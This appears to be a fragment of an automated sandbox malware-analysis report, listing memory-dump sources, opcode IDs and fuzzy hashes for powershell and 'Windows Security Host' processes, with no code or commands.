                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: b32e42112bb97faf1e181dfab0cf471bf86df096b9d56dcc4fb4c97c3f1ec41e
                                                                                                                                                        • Instruction ID: fab761beae930f48a6d18502d04ac29e7bd43f69aa4dc3802c85ed73673c4432
                                                                                                                                                        • Opcode Fuzzy Hash: b32e42112bb97faf1e181dfab0cf471bf86df096b9d56dcc4fb4c97c3f1ec41e
                                                                                                                                                        • Instruction Fuzzy Hash: 2FD1367190EB8E8FF796D76888555B57FA0EF42310B2851BEE04DC72D3DA28D809C392
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000010.00000002.1357447459.00007FFAAC46D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ffaac46d000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2b1d395f483e6ddbd6f8e37ea74f818fb1c02cf334ef0ba3b87a9ff0a0cbb0e1
                                                                                                                                                        • Instruction ID: 7e469558a1f32b09f5d4a8a6ccf7fc1f89dffcbec39e5698fd0be97e4aaf873f
                                                                                                                                                        • Opcode Fuzzy Hash: 2b1d395f483e6ddbd6f8e37ea74f818fb1c02cf334ef0ba3b87a9ff0a0cbb0e1
                                                                                                                                                        • Instruction Fuzzy Hash: 2D41237080EBC48FE7568B2998459523FF0EF53324B1505EFE08CCB1A7D625E84AC792
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000010.00000002.1357871941.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ffaac580000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: cc643459f0823a193bac91a74898b6afc6a31a284f0a96e902912698f3a3c3e3
                                                                                                                                                        • Instruction ID: 25f1fe7d063e4de15e4318f05acfcbbf8d2eb289f3e8585454b50bbe21afcf56
                                                                                                                                                        • Opcode Fuzzy Hash: cc643459f0823a193bac91a74898b6afc6a31a284f0a96e902912698f3a3c3e3
                                                                                                                                                        • Instruction Fuzzy Hash: 114116B3C4E687CBF351AB6C98A65F53BA0DF12315F1881B2E08DD61A3ED18E54993C1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000010.00000002.1357871941.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ffaac580000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: d006d8dca7131a8c758b5ca7caa763f2b6729bd16c032f080d6567e7239116f9
                                                                                                                                                        • Instruction ID: 58d4754f5b937bc4c8169bcb47cc77bc930226809ae1e5940612f17c82749c37
                                                                                                                                                        • Opcode Fuzzy Hash: d006d8dca7131a8c758b5ca7caa763f2b6729bd16c032f080d6567e7239116f9
                                                                                                                                                        • Instruction Fuzzy Hash: 2A31847191CB4C8FDB58DB5CA8466B9BBE0FB99311F00822FE449D3251CA70A9558BC2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Instruction Fuzzy Hash: DBE01A31B4C808CFEA79DB0CE0409B973E1EB99321B2161BBD14EC7561CA22EC559BC0
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000018.00000002.1466440817.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_24_2_7ffaac580000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: N_^$N_^$N_^$N_^$N_^$N_^)
                                                                                                                                                        • API String ID: 0-3377600668
                                                                                                                                                        • Opcode ID: 26a3d85fdac633b49c26827efb34ec9ae7378e4b367ddb06c5ce1475e4b2d157
                                                                                                                                                        • Instruction ID: 31991e612b43ff0b9bf69f447888da92cc43bac2b42c753251ae2fad674899a2
                                                                                                                                                        • Opcode Fuzzy Hash: 26a3d85fdac633b49c26827efb34ec9ae7378e4b367ddb06c5ce1475e4b2d157
                                                                                                                                                        • Instruction Fuzzy Hash: 7961B4A394E7838FF31A57689C760B56FD4EF52314B0981F6E09DCB093ED18A90A5382
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001C.00000002.1617472598.00007FFAAC585000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC585000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac585000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 64ca708efa7d9bc537c4fc04b98d13efe469725369ae1df5d6ffb1c1c9c18629
                                                                                                                                                        • Instruction ID: ffa2346ad7acf48fb7d438eb7bb882d026ba2969f0868ed9007a8e743ff29f7e
                                                                                                                                                        • Opcode Fuzzy Hash: 64ca708efa7d9bc537c4fc04b98d13efe469725369ae1df5d6ffb1c1c9c18629
                                                                                                                                                        • Instruction Fuzzy Hash: 5DD15E30A58A4E8FEF84DF58C455AA97BE1FF69300F14816AE40DD7296CE34E885CBC1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001C.00000002.1620313588.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac650000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c0b48ff5a7b4ba9891b8824b15b99f85a3f01dcca3d128e42403157ae7306e72
                                                                                                                                                        • Instruction ID: f35a38f1e7f79c8ce4c656e00c4c177d5d9ad4cc7d13ab5054284ae4406d6145
                                                                                                                                                        • Opcode Fuzzy Hash: c0b48ff5a7b4ba9891b8824b15b99f85a3f01dcca3d128e42403157ae7306e72
                                                                                                                                                        • Instruction Fuzzy Hash: 5DD1547191EB8E8FF7A6DB2888555B57FA0EF42310B1851BED04DC72D3DA28D809C392
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001C.00000002.1617472598.00007FFAAC585000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC585000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac585000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c149b598507df31673faa3458e62a523ae9e0318b51916195f62a1199ee59b63
                                                                                                                                                        • Instruction ID: 6a663d277db3869fa264df7b0ded791529ab3879ad0981cd69f4dc98cbb535c9
                                                                                                                                                        • Opcode Fuzzy Hash: c149b598507df31673faa3458e62a523ae9e0318b51916195f62a1199ee59b63
                                                                                                                                                        • Instruction Fuzzy Hash: 95F0E271458A8DCFDB46DF2888190E43FE0EF25211B00419BE40DC7061DBA0D918CBC2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001C.00000002.1617472598.00007FFAAC585000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC585000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac585000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: ca17f787f6a7031eb9552c1ab6ff3e16b983d792e93a3f69c6f0c9a4feba067c
                                                                                                                                                        • Instruction ID: 0189ff74b89e2f6e32e3c9445c94be42135fee467b2925d83f4f5827eae5bf46
                                                                                                                                                        • Opcode Fuzzy Hash: ca17f787f6a7031eb9552c1ab6ff3e16b983d792e93a3f69c6f0c9a4feba067c
                                                                                                                                                        • Instruction Fuzzy Hash: 1A31473190EB898FEB15DBA898456F97FE0DB52320F0481BFE04DC7153D964984BCBA1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001C.00000002.1617472598.00007FFAAC585000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC585000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac585000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 578a557b77cb0be7c31a07dbbab263e5d67ead0643cfd87c976e1b755b1a9f7f
                                                                                                                                                        • Instruction ID: 9f7a89cfe880501e9aa8ec92d64264f35c4cd9b778def8fe789dce39ed7e25ca
                                                                                                                                                        • Opcode Fuzzy Hash: 578a557b77cb0be7c31a07dbbab263e5d67ead0643cfd87c976e1b755b1a9f7f
                                                                                                                                                        • Instruction Fuzzy Hash: 0D31907191CB489FDB189B5CA8466A9BBE0FB99311F00822FE44993251CB70A9558BC2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001C.00000002.1615933283.00007FFAAC46D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac46d000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                                                                                                        • Instruction ID: a46ce7e03ff88a071da0977f628ad74d034fc23d8b3fa2cb54a7b3a59b68a0c8
                                                                                                                                                        • Opcode Fuzzy Hash: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                                                                                                        • Instruction Fuzzy Hash: 4B014F3150CE088F9AA4EF1EE48595277E0FB98320710069AD41DC765AD731F895CBC5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001C.00000002.1617472598.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac580000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                        • Instruction ID: 31d55e4f8b66ca5e5f16fd8237a1d02646902d463fb5189d0446cab783842ff9
                                                                                                                                                        • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                        • Instruction Fuzzy Hash: CC01677115CB0D8FD744EF0CE451AB5B7E0FB99364F10056DE58AC3661DA36E882CB45
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001C.00000002.1620313588.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac650000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 8185c56eb8f7f41bd73165e44ff9ffedce15dcb71dd29d3c45ff100103b50b9f
                                                                                                                                                        • Instruction ID: 2ca1db2c0e74a8470fb3e7df0fd8a4e638b4b6d6f4893bbaf095897d4a93ba29
                                                                                                                                                        • Opcode Fuzzy Hash: 8185c56eb8f7f41bd73165e44ff9ffedce15dcb71dd29d3c45ff100103b50b9f
                                                                                                                                                        • Instruction Fuzzy Hash: B9F09A32A4D5488FE669EB5CE4418A877E0EF56320B2150FAE15DC75A3CE25EC44CB80
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001C.00000002.1620313588.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac650000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: e9aef2bda9570ca32e3c4df9baf452a400e13f2d677a0ad9f76134504e02a974
                                                                                                                                                        • Instruction ID: acd2f5b5ca783ce7cf95017a9c4a407848b5cc979d3914ecc7677780079037ff
                                                                                                                                                        • Opcode Fuzzy Hash: e9aef2bda9570ca32e3c4df9baf452a400e13f2d677a0ad9f76134504e02a974
                                                                                                                                                        • Instruction Fuzzy Hash: 49F0E232A8D5488FE759EB1CE4418A877E0FF06320B5150FAE14DCB463CE25EC44C780
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001C.00000002.1620313588.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac650000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                        • Instruction ID: 73551cc810c09e82e539eb5e1c4e7a3fbd698574b07bad01e3e611af36010216
                                                                                                                                                        • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                        • Instruction Fuzzy Hash: DBE01A31B4C808CFEA79DB0CE0409B973E1EB99321B2161BBD14EC7561CA22EC559BC0
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001C.00000002.1617472598.00007FFAAC585000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC585000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac585000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: N_^$N_^$N_^$N_^
                                                                                                                                                        • API String ID: 0-1196809394
                                                                                                                                                        • Opcode ID: 32080cbdb8c01ae3c3512e3a2fc2bdb393f5bdd9a30229deabd592b9719d7d06
                                                                                                                                                        • Instruction ID: a8b818656b0a0503d88322dc3f79c8bfd9ddf04c35c27e3d9ee2ba833bb8fbcf
                                                                                                                                                        • Opcode Fuzzy Hash: 32080cbdb8c01ae3c3512e3a2fc2bdb393f5bdd9a30229deabd592b9719d7d06
                                                                                                                                                        • Instruction Fuzzy Hash: 0A415F9294F7C38FF35A475848660B56FE4EF53324F0981F6E18C8B0D3E91D994A9392
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001C.00000002.1617472598.00007FFAAC585000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC585000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac585000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: N_^$N_^$N_^$N_^
                                                                                                                                                        • API String ID: 0-1196809394
                                                                                                                                                        • Opcode ID: dfa48eac710f147ebdf91eea26af487558908ace2fd0f8657d0a303cbf2734c8
                                                                                                                                                        • Instruction ID: 7ca30de2bfb1a680445ff34cfea948ed24c9b1131fcd8b9240880e3e52538d32
                                                                                                                                                        • Opcode Fuzzy Hash: dfa48eac710f147ebdf91eea26af487558908ace2fd0f8657d0a303cbf2734c8
                                                                                                                                                        • Instruction Fuzzy Hash: 34316F9294F783CBF75E435888650B02BD4EF62334F0981F6E18D870D3E91DAA0A9392
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000022.00000002.1955991572.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_34_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 69eff7dd790c36bfa8ac347cf9769621235c0ff79a2d676a320b1bd29e4d85ce
                                                                                                                                                        • Instruction ID: 9d64a7818d2c18808f3301b4a7a8a2d4a4b611a748789b12ab50feb4b762505c
                                                                                                                                                        • Opcode Fuzzy Hash: 69eff7dd790c36bfa8ac347cf9769621235c0ff79a2d676a320b1bd29e4d85ce
                                                                                                                                                        • Instruction Fuzzy Hash: 04220871F6DA5A4FFB94EB38C4596797BD2FF89340F4445B9E00EC3292DE29A8058381
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000022.00000002.1955991572.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_34_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 609eff88c81fbe76f0fc400f1bf01e892165bb9822c479236369c200c893300c
                                                                                                                                                        • Instruction ID: 2f6526031e6445723c60bc7a4c40d9972f6019e6a9405cb4e552763aae8cbda6
                                                                                                                                                        • Opcode Fuzzy Hash: 609eff88c81fbe76f0fc400f1bf01e892165bb9822c479236369c200c893300c
                                                                                                                                                        • Instruction Fuzzy Hash: 6402E661F69A5A4FFB98EB38C45967976D2FF89340F4485B9E00EC32D2DD2DAC058381
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000022.00000002.1955991572.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_34_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: f7c5c643205f8a3e33e88648ae7f50d69abd40a30ea10ba9bae853199cfaf181
                                                                                                                                                        • Instruction ID: f25111256e972ebf965faa9782778839804acc8a2d920db87d66b65b512d2a5f
                                                                                                                                                        • Opcode Fuzzy Hash: f7c5c643205f8a3e33e88648ae7f50d69abd40a30ea10ba9bae853199cfaf181
                                                                                                                                                        • Instruction Fuzzy Hash: BB21C362D58A5B8BFB44A3B8D8655FAABF5FF45300F448076E00AD7193DD29A80647C1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000022.00000002.1955991572.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_34_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: b7d98476fa6cae4dad3b5f7e47615d99d65a161f474af01bea03b261504bb5b4
                                                                                                                                                        • Instruction ID: dc5a8111b5f92c4c9c11258208a97d7f596b46ee63ee29b068db87d9bddb1ca8
                                                                                                                                                        • Opcode Fuzzy Hash: b7d98476fa6cae4dad3b5f7e47615d99d65a161f474af01bea03b261504bb5b4
                                                                                                                                                        • Instruction Fuzzy Hash: 3A515722A0E7860FE356A778C8265757FE5EF9B210B0944FAE48DC72A3CC1C9C468352
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000022.00000002.1955991572.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_34_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2c43d64b54fc03eb04afb8862ee71af9638a1d45269dc9354b3061161b09bca5
                                                                                                                                                        • Instruction ID: 989a08f3ad854c442310bb2ca4e2250a3ba88337b24c80c9ed47d38e9e714460
                                                                                                                                                        • Opcode Fuzzy Hash: 2c43d64b54fc03eb04afb8862ee71af9638a1d45269dc9354b3061161b09bca5
                                                                                                                                                        • Instruction Fuzzy Hash: 20319392B1DA4A8BF744B7B898597BD77D6EB9D311F0486B6E00DC3292DD2C98428381
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000022.00000002.1955991572.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_34_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 89edfa19e6277a47e63f273b3178a4d515a3c13cf5cb8e47b418174fda6b5e4b
                                                                                                                                                        • Instruction ID: 8627292644537216cf1abf8705b65d53af6c28b158044bd6f07008520ca35e95
                                                                                                                                                        • Opcode Fuzzy Hash: 89edfa19e6277a47e63f273b3178a4d515a3c13cf5cb8e47b418174fda6b5e4b
                                                                                                                                                        • Instruction Fuzzy Hash: 09319571A5860A8FEB44EBB8C8556ED77E1FF99300F508575D00AD7292CE39A8458781
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000022.00000002.1955991572.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_34_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 728733971208bd146bc176040d56d705b06093cd60ee3a1084f06a1305fe56c2
                                                                                                                                                        • Instruction ID: ada7555f35d8ee1887c0a38b25745f9dfa43dc2f92abc8bd2d98352f27cdb466
                                                                                                                                                        • Opcode Fuzzy Hash: 728733971208bd146bc176040d56d705b06093cd60ee3a1084f06a1305fe56c2
                                                                                                                                                        • Instruction Fuzzy Hash: D8214161B189494FE788FB2CD45A778B6C2EB99315F0449BAE04EC3293DE689C418745
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000022.00000002.1955991572.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_34_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: e9cac144d849d2899c72cc788628890df85cccc80da0ec408a3173f3f7d38ef8
                                                                                                                                                        • Instruction ID: 3f3b1fd3119fb6076ab0b0fe23f91f0b3f816a6226778f4b9306e9145bdbbbda
                                                                                                                                                        • Opcode Fuzzy Hash: e9cac144d849d2899c72cc788628890df85cccc80da0ec408a3173f3f7d38ef8
                                                                                                                                                        • Instruction Fuzzy Hash: 2A31F861A8D6894FD751DB78C8A58B93FA1EF89340F85C4B5E80AC7397CD34AD05C782
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000022.00000002.1955991572.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_34_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: ba33f2cc1ff4fb5305997e0f7dcb9af38bea3a65309ecddbd54c72d4dc75471a
                                                                                                                                                        • Instruction ID: a01526318772923d2b18d5a66ec166ee043e14d00f8a8793985b9d4057b633e7
                                                                                                                                                        • Opcode Fuzzy Hash: ba33f2cc1ff4fb5305997e0f7dcb9af38bea3a65309ecddbd54c72d4dc75471a
                                                                                                                                                        • Instruction Fuzzy Hash: 8801244994E6824FF351A7385C549327FE4CB96340B0844FAE88DC7197D80D994983C2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000022.00000002.1955991572.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_34_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 8aa4c7cc9f222e55d1f9b37b0eb4fa21af1bcbc33c0ff46559c6574f236d66ff
                                                                                                                                                        • Instruction ID: bf7144f8daacb90b615d6aeb71f82118fd7abc1a0241831358e6dcf89d12d6f2
                                                                                                                                                        • Opcode Fuzzy Hash: 8aa4c7cc9f222e55d1f9b37b0eb4fa21af1bcbc33c0ff46559c6574f236d66ff
                                                                                                                                                        • Instruction Fuzzy Hash: 52D09531C5492D4FE694CA2CE008176F7D4EB4525071401FBF40CD3560C5654C4143C5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000022.00000002.1955991572.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_34_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: <N_^$=N_^$N_^j$N_^p
                                                                                                                                                        • API String ID: 0-2936155160
                                                                                                                                                        • Opcode ID: 61c07cf0960d95d2eab6891a071833b769e7aff13fe1cf8bed470a440df4cd6d
                                                                                                                                                        • Instruction ID: f570372f7c0af8eb1ccb59e89209c49791e3e2292d7ede43e578b36955aad554
                                                                                                                                                        • Opcode Fuzzy Hash: 61c07cf0960d95d2eab6891a071833b769e7aff13fe1cf8bed470a440df4cd6d
                                                                                                                                                        • Instruction Fuzzy Hash: 2F313AE7A8D5178AF30233FC6C655E82BC59F89374718C9B2D29DCA1D3CD18B04A56D2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000023.00000002.2036651413.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_35_2_7ffaac590000_Windows Security Host.jbxd
Strings